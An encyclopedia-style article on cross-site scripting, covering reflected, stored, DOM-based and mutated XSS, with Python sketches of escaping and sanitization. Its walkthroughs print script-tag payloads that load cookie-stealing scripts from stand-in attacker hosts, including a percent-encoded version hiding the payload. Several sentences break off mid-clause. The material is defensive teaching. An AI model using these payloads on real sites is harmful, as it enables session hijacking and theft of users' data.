Background
Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the same-origin policy. This essentially states that if content from one site (such as
Types
There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: ''non-persistent'' and ''persistent''. Some sources further divide these two groups into ''traditional'' (caused by server-side code flaws) and
Non-persistent (reflected)
The ''non-persistent'' (or ''reflected'') cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly
Persistent (or stored)
The ''persistent'' (or ''stored'') XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.
For example, suppose there is a dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's real name and email. These are kept secret on the server. The only time a member's real name and email are in the browser is when the member is signed in, and they can't see anyone else's.
Suppose that Mallory, an attacker, joins the site and wants to figure out the real names of the people she sees on the site. To do so, she writes a script designed to run from other users' browsers when ''they'' visit ''her'' profile. The script then sends a quick message to her own server, which collects this information. To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal), but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a <script> element, it won't be shown on the screen. Then suppose that Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's real name and email directly from his own machine.
Persistent XSS vulnerabilities can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code could be further designed to self-propagate across accounts, creating a type of client-side worm.
The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, IM etc.) that can be controlled by an attacker could become an injection vector.
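The stored flow described in this section can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not any real site's code: the in-memory `profiles` dictionary, the function names, and the `attacker.example` URL are all hypothetical. It shows that the attacker's answer is stored once and then served to every later visitor, and that entity-encoding at output time turns the script into inert text.

```python
import html

# Hypothetical in-memory "database" of profile answers (an assumption for this sketch).
profiles = {}

def save_answer(user, answer):
    """Store the answer exactly as submitted; nothing is filtered at this point."""
    profiles[user] = answer

def render_profile_unsafe(user):
    """Vulnerable: the stored text is placed into the page verbatim."""
    return "<p>Ideal first date: " + profiles[user] + "</p>"

def render_profile_escaped(user):
    """Safer: HTML-significant characters are entity-encoded on output."""
    return "<p>Ideal first date: " + html.escape(profiles[user]) + "</p>"

# A normal-looking answer with a script appended (hypothetical payload URL).
payload = 'A walk on the beach.<script src="http://attacker.example/steal.js"></script>'
save_answer("mallory", payload)

unsafe_page = render_profile_unsafe("mallory")    # contains a live <script> element
escaped_page = render_profile_escaped("mallory")  # contains only &lt;script ... text
print(unsafe_page)
print(escaped_page)
```

Escaping at render time rather than at storage time is a design choice in this sketch: the stored data stays unchanged, and each output context can apply the encoding it needs.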
Server-side versus DOM-based vulnerabilities
XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The demand for an improved user experience led to the popularity of applications in which most of the presentation logic (possibly written in JavaScript) runs on the client side and pulls data, on demand, from the server using AJAX. As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to appear that was called
Self-XSS
Self-XSS is a form of XSS vulnerability that relies on
Mutated XSS (mXSS)
Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is the browser rebalancing unclosed quotation marks, or even adding quotation marks to unquoted parameters of the CSS font-family property.
Exploit examples
Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the Alice-and-Bob cast of characters commonly used in computer security. The Browser Exploitation Framework could be used to attack the web site and the user's local environment.
Non-persistent
# Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. When a user logs in, the browser keeps an Authorization Cookie, which looks like some random characters, so both computers (client and server) have a record that she's logged in.
# Mallory observes that Bob's website contains a reflected XSS vulnerability:
## When she visits the Search page, she inputs a search term in the search box and clicks the submit button. If no results were found, the page will display the term she searched for followed by the words "not found," and the URL will be http://bobssite.org/search?q=her%20search%20term.
## With a normal search query, like the word "puppies", the page simply displays "puppies not found" and the URL is "http://bobssite.org/search?q=
- which is exploitable behavior.
# Mallory crafts a URL to exploit the vulnerability:
## She makes the URL http://bobssite.org/search?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>. She could choose to encode the ASCII characters with percent-encoding, such as http://bobssite.org/search?q=puppies%3Cscript%20src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E, so that human readers cannot immediately decipher the malicious URL.
## She sends an e-mail to some unsuspecting members of Bob's site, saying "Check out some cute puppies!"
# Alice gets the e-mail. She loves puppies and clicks on the link. It goes to Bob's website to search, doesn't find anything, and displays "puppies not found" but right in the middle, the script tag runs (it is invisible on the screen) and loads and runs Mallory's program authstealer.js (triggering the XSS attack). Alice forgets about it.
# The authstealer.js program runs in Alice's browser as if it originated from Bob's website. It grabs a copy of Alice's Authorization Cookie and sends it to Mallory's server, where Mallory retrieves it.
# Mallory now puts Alice's Authorization Cookie into her browser as if it were her own. She then goes to Bob's site and is now logged in as Alice.
# Now that she's in, Mallory goes to the Billing section of the website and looks up Alice's credit card number and grabs a copy. Then she goes and changes Alice's account password so Alice can't log in anymore.
# She decides to take it a step further and sends a similarly crafted link to Bob himself, thus gaining administrator privileges to Bob's website.
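The percent-encoding step in this walkthrough can be reproduced with Python's standard `urllib.parse` module. The sketch below is illustrative only; the variable names are assumptions, while the URL and payload are the ones from the example above. It encodes the payload so that it is hard to read at a glance, then shows that ordinary query-string parsing on the server side recovers the original markup unchanged.

```python
from urllib.parse import quote, urlsplit, parse_qs

base = "http://bobssite.org/search?q="
payload = 'puppies<script src="http://mallorysevilsite.com/authstealer.js"></script>'

# safe="" makes quote() also encode "/" (which it leaves alone by default).
encoded_url = base + quote(payload, safe="")
print(encoded_url)

# Standard query parsing decodes the parameter back to the raw markup,
# so the obfuscation changes nothing about what the page will reflect.
decoded_q = parse_qs(urlsplit(encoded_url).query)["q"][0]
print(decoded_q == payload)
```

The encoding is purely cosmetic from the server's point of view, which is why hiding the payload from human readers does not weaken the attack.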
Several things could have been done to mitigate this attack:
# The search input could have been sanitized, which would include proper encoding checking.
# The web server could be set to redirect invalid requests.
# The web server could detect a simultaneous login and invalidate the sessions.
# The web server could detect a simultaneous login from two different IP addresses and invalidate the sessions.
# The website could display only the last few digits of a previously used credit card.
# The website could require users to enter their passwords again before changing their registration information.
# The website could set the HttpOnly flag on its authorization cookie to prevent access from JavaScript.
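Two of the mitigations listed above, encoding the search term on output and marking the cookie HttpOnly, might look roughly like this in Python. It is a sketch using only the standard library; the function names, the cookie name `session`, and the page template are hypothetical and not taken from any particular framework.

```python
import html
from http.cookies import SimpleCookie

def results_page_unsafe(term):
    """Vulnerable: the search term is reflected into the page verbatim."""
    return "<p>" + term + " not found</p>"

def results_page_escaped(term):
    """The term is HTML-entity-encoded before being placed in the page."""
    return "<p>" + html.escape(term) + " not found</p>"

def session_cookie_header(session_id):
    """Build a Set-Cookie value that page scripts cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id           # hypothetical cookie name
    cookie["session"]["httponly"] = True     # hidden from document.cookie
    cookie["session"]["secure"] = True       # only sent over HTTPS
    return cookie["session"].OutputString()

term = 'puppies<script src="http://mallorysevilsite.com/authstealer.js"></script>'
unsafe_html = results_page_unsafe(term)
safe_html = results_page_escaped(term)
header = session_cookie_header("abc123")
print(safe_html)
print(header)
```

The two measures are complementary: output encoding stops the injected markup from executing, while HttpOnly limits what a script could steal if some other injection point were missed.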
Persistent attack
# Mallory gets an account on Bob's website.
# Mallory observes that Bob's website contains a stored XSS vulnerability: if one goes to the News section and posts a comment, the site will display whatever is entered. If the comment text contains HTML tags, they will be added to the webpage's source; in particular, any script tags will run when the page is loaded.
# Mallory reads an article in the News section and enters a comment: I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js"></script>
# When Alice (or anyone else) loads the page with the comment, Mallory's script tag runs and steals Alice's authorization cookie, sending it to Mallory's secret server for collection.
# Mallory can now
Preventive measures
Contextual output encoding/escaping of string input
There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document, including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. Performing HTML entity encoding only on the five XML significant characters is not always sufficient to prevent many forms of XSS attacks, and security encoding libraries are usually easier to use than hand-written escaping. Some web template systems understand the structure of the HTML they produce and automatically pick an appropriate encoder.
Safely validating untrusted HTML input
Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML sanitization engine to ensure that it does not contain XSS code.
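The difference between output encoding and sanitization can be illustrated with a small Python sketch built on the standard library's `html.parser`. It is a toy under stated assumptions, not a production sanitization engine: the class name, the `ALLOWED_TAGS` set, and the choice to drop every attribute are all decisions made for this example, and a real application would normally rely on a maintained sanitization library. The sketch keeps a short list of formatting tags, removes all other tags and all attributes, and entity-encodes the remaining text.

```python
import html
from html.parser import HTMLParser

# Assumption for this sketch: only these formatting tags are permitted.
ALLOWED_TAGS = {"b", "i", "em", "strong"}

class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from parser events, keeping only allowed tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append("<" + tag + ">")  # every attribute is dropped

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append("</" + tag + ">")

    def handle_data(self, data):
        self.parts.append(html.escape(data))    # text is always encoded

def sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.parts)

user_input = '<b onclick="evil()">very</b> large'
encoded = html.escape(user_input)   # shown to the reader as literal markup
sanitized = sanitize(user_input)    # rendered by the browser as bold text
print(encoded)
print(sanitized)
```

Building the output from an allowlist means that any tag or attribute the sketch does not explicitly recognize is dropped by default, which is the opposite of trying to enumerate every dangerous construct.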
Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the following